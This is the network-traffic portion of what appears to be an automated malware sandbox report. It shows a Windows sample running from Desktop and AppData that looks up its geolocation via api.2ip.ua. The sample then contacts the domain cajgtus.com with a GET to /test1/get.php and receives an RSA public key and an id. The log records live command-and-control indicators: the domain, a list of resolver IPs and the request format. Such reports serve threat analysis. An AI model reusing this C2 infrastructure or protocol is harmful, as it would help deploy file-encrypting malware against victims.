Aug 9, 2024 10:48:09.976942062 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.976948977 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.976993084 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.977032900 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:09.977092028 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.979443073 CEST	49730	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:09.979460001 CEST	443	49730	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:21.991537094 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:21.991571903 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:21.991661072 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.017091990 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.017115116 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.483052969 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.483300924 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.489573002 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.489588022 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.489953995 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.490001917 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.491751909 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.536494017 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.865746021 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.865798950 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.865823984 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.865871906 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.865878105 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.865916014 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:22.865957022 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.865957022 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.866481066 CEST	49736	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:22.866499901 CEST	443	49736	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.068718910 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.068759918 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.068816900 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.079312086 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.079328060 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.562115908 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.562207937 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.605650902 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.605674982 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.606662989 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.606729031 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.608263016 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.652510881 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.952529907 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.952600956 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.952619076 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.952666044 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.952689886 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.952738047 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.952747107 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.952790022 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.952816963 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:32.952863932 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.953217983 CEST	49738	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:32.953233004 CEST	443	49738	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:39.454797029 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:39.454844952 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:39.454912901 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:39.469312906 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:39.469331026 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:39.941502094 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:39.941728115 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:39.947196960 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:39.947206020 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:39.947551966 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:39.947726011 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:39.949544907 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:39.992521048 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:40.324897051 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:40.325012922 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:40.325031996 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:40.325134039 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:40.325141907 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:40.325160980 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:40.325208902 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:40.325208902 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:40.325716019 CEST	49739	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:40.325736046 CEST	443	49739	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:44.430789948 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:44.430840015 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:44.430924892 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:44.446852922 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:44.446894884 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:44.918557882 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:44.918680906 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:44.924071074 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:44.924088001 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:44.924448013 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:44.924541950 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:44.926321030 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:44.972503901 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:45.328351021 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:45.328413963 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:45.328438997 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:45.328488111 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:45.328495979 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:45.328551054 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:45.328557968 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:45.328610897 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:45.329549074 CEST	49740	443	192.168.2.4	188.114.97.3
Aug 9, 2024 10:48:45.329566002 CEST	443	49740	188.114.97.3	192.168.2.4
Aug 9, 2024 10:48:48.080625057 CEST	64820	80	192.168.2.4	58.151.148.90
Aug 9, 2024 10:48:48.085469961 CEST	80	64820	58.151.148.90	192.168.2.4
Aug 9, 2024 10:48:48.085536003 CEST	64820	80	192.168.2.4	58.151.148.90
Aug 9, 2024 10:48:48.094003916 CEST	64820	80	192.168.2.4	58.151.148.90
Aug 9, 2024 10:48:48.100888968 CEST	80	64820	58.151.148.90	192.168.2.4
Aug 9, 2024 10:48:49.611197948 CEST	80	64820	58.151.148.90	192.168.2.4
Aug 9, 2024 10:48:49.611253977 CEST	64820	80	192.168.2.4	58.151.148.90
Aug 9, 2024 10:48:49.611371040 CEST	64820	80	192.168.2.4	58.151.148.90
Aug 9, 2024 10:48:49.611465931 CEST	80	64820	58.151.148.90	192.168.2.4
Aug 9, 2024 10:48:49.611552954 CEST	64820	80	192.168.2.4	58.151.148.90
Aug 9, 2024 10:48:49.616215944 CEST	80	64820	58.151.148.90	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2024 10:48:09.024024963 CEST	58095	53	192.168.2.4	1.1.1.1
Aug 9, 2024 10:48:09.035471916 CEST	53	58095	1.1.1.1	192.168.2.4
Aug 9, 2024 10:48:45.410033941 CEST	50719	53	192.168.2.4	1.1.1.1
Aug 9, 2024 10:48:46.409161091 CEST	50719	53	192.168.2.4	1.1.1.1
Aug 9, 2024 10:48:47.424757957 CEST	50719	53	192.168.2.4	1.1.1.1
Aug 9, 2024 10:48:47.496680021 CEST	53	57522	162.159.36.2	192.168.2.4
Aug 9, 2024 10:48:48.056759119 CEST	53	58036	1.1.1.1	192.168.2.4
Aug 9, 2024 10:48:48.078246117 CEST	53	50719	1.1.1.1	192.168.2.4
Aug 9, 2024 10:48:48.078259945 CEST	53	50719	1.1.1.1	192.168.2.4
Aug 9, 2024 10:48:48.078272104 CEST	53	50719	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 9, 2024 10:48:09.024024963 CEST	192.168.2.4	1.1.1.1	0xcadd	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:45.410033941 CEST	192.168.2.4	1.1.1.1	0xd275	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:46.409161091 CEST	192.168.2.4	1.1.1.1	0xd275	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:47.424757957 CEST	192.168.2.4	1.1.1.1	0xd275	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 9, 2024 10:48:09.035471916 CEST	1.1.1.1	192.168.2.4	0xcadd	No error (0)	api.2ip.ua	188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:09.035471916 CEST	1.1.1.1	192.168.2.4	0xcadd	No error (0)	api.2ip.ua	188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	58.151.148.90	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	186.101.193.110	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	190.13.174.94	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	191.191.224.16	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	181.123.219.23	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	187.152.11.54	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	201.191.99.134	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	211.171.233.126	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	95.86.30.3	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078246117 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	196.189.156.245	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	58.151.148.90	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	186.101.193.110	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	190.13.174.94	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	191.191.224.16	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	181.123.219.23	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	187.152.11.54	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	201.191.99.134	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	211.171.233.126	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	95.86.30.3	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078259945 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	196.189.156.245	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	58.151.148.90	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	186.101.193.110	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	190.13.174.94	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	191.191.224.16	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	181.123.219.23	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	187.152.11.54	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	201.191.99.134	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	211.171.233.126	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	95.86.30.3	A (IP address)	IN (0x0001)	false
Aug 9, 2024 10:48:48.078272104 CEST	1.1.1.1	192.168.2.4	0xd275	No error (0)	cajgtus.com	196.189.156.245	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.2ip.ua

cajgtus.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	64820	58.151.148.90	80	4904	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 10:48:48.094003916 CEST	128	OUT	GET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
Aug 9, 2024 10:48:49.611197948 CEST	761	IN	HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 08:48:59 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 75 35 31 66 77 6e 51 79 38 55 75 2b 73 49 4a 6e 73 66 38 42 5c 5c 6e 66 53 69 7a 31 61 75 68 5a 74 4c 39 39 6a 48 62 75 64 32 37 79 42 32 34 78 54 58 6a 52 78 6e 46 5c 2f 71 55 44 6a 74 50 75 4d 7a 71 52 39 63 6e 6b 34 46 4d 34 62 44 37 33 77 51 52 72 64 52 46 68 5c 5c 6e 53 45 35 57 6b 31 31 76 74 6b 53 50 70 34 7a 43 4e 6e 58 37 69 4f 42 47 78 52 71 36 54 52 58 41 33 72 58 6c 4d 2b 50 75 6f 52 5a 4a 76 6f 53 6d 31 67 38 39 63 56 6e 6d 70 38 75 75 55 5a 67 4d 5c 5c 6e 30 45 74 6c 55 6b 62 48 57 4b 46 6b 72 33 4c 4e 47 5a 6c 33 33 68 55 6d 76 46 69 77 30 43 51 52 71 2b 54 34 44 49 7a 39 64 6e 4b 46 6f 53 43 4f 44 43 4f 41 59 4c 34 65 66 62 59 47 5a 69 6c 37 5c 5c 6e 63 33 5c 2f 48 7a 35 43 46 45 2b 66 65 56 54 [TRUNCATED] Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu51fwnQy8Uu+sIJnsf8B\\nfSiz1auhZtL99jHbud27yB24xTXjRxnF\/qUDjtPuMzqR9cnk4FM4bD73wQRrdRFh\\nSE5Wk11vtkSPp4zCNnX7iOBGxRq6TRXA3rXlM+PuoRZJvoSm1g89cVnmp8uuUZgM\\n0EtlUkbHWKFkr3LNGZl33hUmvFiw0CQRq+T4DIz9dnKFoSCODCOAYL4efbYGZil7\\nc3\/Hz5CFE+feVT+eU4zbNtCm4B7vyBvKN4sMiDRakJHQZsJZ4HdkUFj9OMqN774a\\nc6ikgCtTJdIBxE7Za7YoSYIPGvgA4k\/QNvqV6O6U73qNBe04kRxsZn83tIf65Evc\\nOQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	188.114.97.3	443	6956	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-09 08:48:09 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-08-09 08:48:09 UTC	893	IN	HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 08:48:09 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p0tvoscbdmIFxezAPTo2VuO7M%2FAnKFMtEeRtYaNgfWkMrkK0rnC3PzoU9pwG%2FJKHYzd8zrBp2fx4HW4DszakxEddZj6M%2BudG9TGcOu%2BH1ZIhHogZx5DbQ17u%2F9xE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b067c4c6970188d-EWR alt-svc: h3=":443"; ma=86400
2024-08-09 08:48:09 UTC	418	IN	Data Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
2024-08-09 08:48:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	188.114.97.3	443	5644	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-09 08:48:22 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-08-09 08:48:22 UTC	893	IN	HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 08:48:22 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KvzkUA3%2B1%2FNaC2HgMeEJtCRtgPGerLjLO%2FEAJyRU%2BZX0EAwfFvWFYdSBXjl5RkpW04OLAA1uzjHrhlbnmSZsJF3%2FlKIUcJM0DvIwHNuLquBWmQjgrn0P6YcG2m6s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b067c9d1d460f64-EWR alt-svc: h3=":443"; ma=86400
2024-08-09 08:48:22 UTC	418	IN	Data Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
2024-08-09 08:48:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	188.114.97.3	443	3512	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-09 08:48:32 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-08-09 08:48:32 UTC	889	IN	HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 08:48:32 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CsiHi1k9RAELdkI4x7e8FPc%2F%2BxXmm6AuT3Krli3GIlt6lWXLmzidzyMx5aMkl2HXcYcX1WH3snPsNIVQKupEGJ%2BwoTGbG1pxen4RmY5OIr2QLpwXEeL6ATo6Wme"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b067cdc1a980f4f-EWR alt-svc: h3=":443"; ma=86400
2024-08-09 08:48:32 UTC	418	IN	Data Raw: 31 39 62 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 Data Ascii: 19b{"ip":"8.46.123.33","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044c
2024-08-09 08:48:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	188.114.97.3	443	5944	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe

Timestamp	Bytes transferred	Direction	Data
